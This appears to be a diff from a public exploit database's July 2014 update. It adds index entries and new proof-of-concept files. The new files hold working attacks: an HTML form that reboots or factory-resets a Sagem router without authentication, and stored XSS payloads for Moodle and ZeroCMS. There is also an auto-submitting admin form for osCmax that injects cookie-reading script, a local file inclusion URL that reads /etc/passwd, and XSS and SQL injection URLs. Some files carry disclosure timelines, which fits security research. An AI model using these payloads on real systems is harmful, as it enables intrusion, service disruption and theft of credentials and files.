Updated 07_28_2014

files.csv

@@ -30775,3 +30775,11 @@ id,file,description,date,author,platform,type,port
 34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection Vulnerability",2010-06-18,"L0rd CrusAd3r",php,webapps,0
 34167,platforms/win32/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,metasploit,win32,local,0
 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80
+34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0
+34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0
+34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0
+34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0
+34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0
+34176,platforms/php/webapps/34176.html,"osCmax 2.0 'articles.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS 'copy_folder.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 Cross Site Scripting Vulnerability",2010-06-21,IBM,jsp,webapps,0

platforms/hardware/webapps/34172.txt

@@ -0,0 +1,30 @@
+# Title              : Sagem F@st 3304-V1 denial of service Vulnerability
+# Vendor Homepage    : http://www.sagemcom.com
+# Tested on          : Firefox, Google Chrome
+# Tested Router      : Sagem F@st 3304-V1 
+# Date               : 2014-07-26
+# Author             : Z3ro0ne
+# Contact            : saadousfar59@gmail.com
+# Facebook Page      : https://www.facebook.com/Z3ro0ne
+
+# Vulnerability description :
+the Vulnerability allow unauthenticated users to remotely restart and reset the router
+# Exploit:
+
+<html>
+<title>SAGEM FAST3304-V1 DENIAL OF SERVICE</title>
+<body>
+<FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
+    <INPUT TYPE="SUBMIT" VALUE="REBOOT ROUTER">
+  </FORM>
+  <FORM ACTION="http://192.168.1.1/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale">
+    <INPUT TYPE="SUBMIT" VALUE="FACTORY RESET">
+  </FORM>
+</body>
+</html>
+Reset to factory configuration :
+--- Using Google Chrome browser :
+to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar 
+
+
+

platforms/jsp/webapps/34179.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41030/info
+
+IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects version 6.7. 
+
+
+The following example input to the URI is available:
+?<script>alert(31521);</script>? 

platforms/php/remote/34160.txt

@@ -291,3 +291,5 @@ print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
 print
 
 sys.exit()
+
+##EDB-Note: Web server has to be able to interpret .php5 files 

platforms/php/webapps/34169.txt

@@ -0,0 +1,24 @@
+Title: Moodle 2.7 Persistent XSS
+Vendor: https://moodle.org/
+Moodle advisory: https://moodle.org/mod/forum/discuss.php?d=264265
+Researched by: Osanda Malith Jayathissa (@OsandaMalith)
+E-Mail: osanda[cat]unseen.is
+Original write-up: http://osandamalith.wordpress.com/2014/07/25/moodle-2-7-persistent-xss/
+
+[-] POC
+================
+
+1. Edit your profile
+2. Click Optional
+3. In Skype ID field inject this payload
+
+x" onload="prompt('XSS by Osanda')">"
+
+[-] Disclosure Timeline
+========================
+
+2014-05-24: Responsibly disclosed to the Vendor
+2014-05-27: Suggested a fix
+2014-06-04: Fix got accepted
+2014-07-21: Vendor releases a security announcement 
+2014-07-24: Released Moodle 2.7.1 stable with all patches

platforms/php/webapps/34170.txt

@@ -0,0 +1,54 @@
+######################
+# Exploit Title: Persistent ZeroCMS Cross-Site Scripting Vulnerability
+
+# Discovered by: Mayuresh Dani
+
+# Vendor Homepage: http://www.aas9.in/zerocms/
+
+# Software Link: https://github.com/pcx1256/zerocms/archive/master.zip
+
+# Version: 1.0?
+
+# Date: 2014-07-25
+
+# Tested on: Windows 7 / Mozilla Firefox
+              Ubuntu 14.04 / Mozilla Firefox
+
+# CVE: CVE-2014-4710
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2014-06-15:  Discovered vulnerability
+2014-06-23:  Vendor Notification (Support e-mail address)
+2014-07-25:  Public Disclosure
+
+# Description
+
+ZeroCMS is a very simple Content Management System Built using PHP and
+MySQL.
+
+The application does not validate any input to the "Full Name", "Email
+Address", "Password" or "Confirm Password" functionality. It saves this
+unsanitized input in the backend databased and executes it when visiting
+the subsequent or any logged-in pages.
+
+######################
+
+# Steps to reproduce the vulnerability
+
+1) Visit the "Create Account" page (eg.
+http://localhost/zerocms/zero_transact_user.php)
+
+2) Enter your favourite XSS payload and click on "Create Account"
+
+3) Enjoy!
+
+More information:
+https://community.qualys.com/blogs/securitylabs/2014/07/24/yet-another-zerocms-cross-site-scripting-vulnerability-cve-2014-4710
+
+#####################
+
+Thanks,
+Mayuresh.

platforms/php/webapps/34173.txt

@@ -0,0 +1,12 @@
+# Exploit Title: DirPHP - version 1.0 Local File Inclusion
+# Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart
+Montgomery
+# Date: 7/26/14
+# Exploit Author: -Chosen-
+# Contact: dark[dot]binary[dot]code@gmail.com
+# Version: DirPHP - Version 1.0
+# Tested on: *nix
+
+PoC:
+
+http://site.com/path/index.php?phpfile=/etc/passwd

platforms/php/webapps/34175.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/40995/info
+
+SaffaTunes CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/cms/news.php?id=9[CODE]
+http://www.example.com/cms/news.php?year=2010[CODE] 

platforms/php/webapps/34176.html

@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/40998/info
+
+osCmax is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+osCMax 2.0.25 is vulnerable; other versions may also be affected.
+
+<form action="http://www.example.com/admin/articles.php?tPath=1&aID=1&action=update_article" method="post" name="main" enctype="multipart/form-data" >
+<input type="hidden" name="articles_status" value="1" />
+<input type="hidden" name="articles_date_available" value="2010-06-04" />
+<input type="hidden" name="authors_id" value="" />
+<input type="hidden" name="articles_date_added" value="2010-06-04 00:00:00" />
+<input type="hidden" name="x" value="1" />
+<input type="hidden" name="y" value="2" />
+
+<input type="hidden" name="articles_name[1]" value="article name" />
+<input type="hidden" name="articles_description[1]" value='content"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="articles_url[1]" value="" />
+<input type="hidden" name="articles_head_title_tag[1]" value="article title" />
+<input type="hidden" name="articles_head_desc_tag[1]" value="" />
+<input type="hidden" name="articles_head_keywords_tag[1]" value="" />
+
+<input type="hidden" name="articles_name[2]" value="article name" />
+<input type="hidden" name="articles_description[2]" value='content"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="articles_url[2]" value="" />
+<input type="hidden" name="articles_head_title_tag[2]" value="article title" />
+<input type="hidden" name="articles_head_desc_tag[2]" value="" />
+<input type="hidden" name="articles_head_keywords_tag[2]" value="" />
+
+<input type="hidden" name="articles_name[3]" value="article name" />
+<input type="hidden" name="articles_description[3]" value='content"><script>alert(document.cookie)</script>' />
+<input type="hidden" name="articles_url[3]" value="" />
+<input type="hidden" name="articles_head_title_tag[3]" value="article title" />
+<input type="hidden" name="articles_head_desc_tag[3]" value="" />
+<input type="hidden" name="articles_head_keywords_tag[3]" value="" />
+
+<input type="hidden" name="x" value="3" />
+<input type="hidden" name="y" value="4" />
+
+</form>
+<script>
+document.main.submit();
+</script>

platforms/php/webapps/34177.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41000/info
+
+Sigmer Technologies Scribe CMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+https://www.example.com/path/copy_folder.php?path=SITE/%3Cscript%3Ealert%28document.cookie%29%3C/script%3E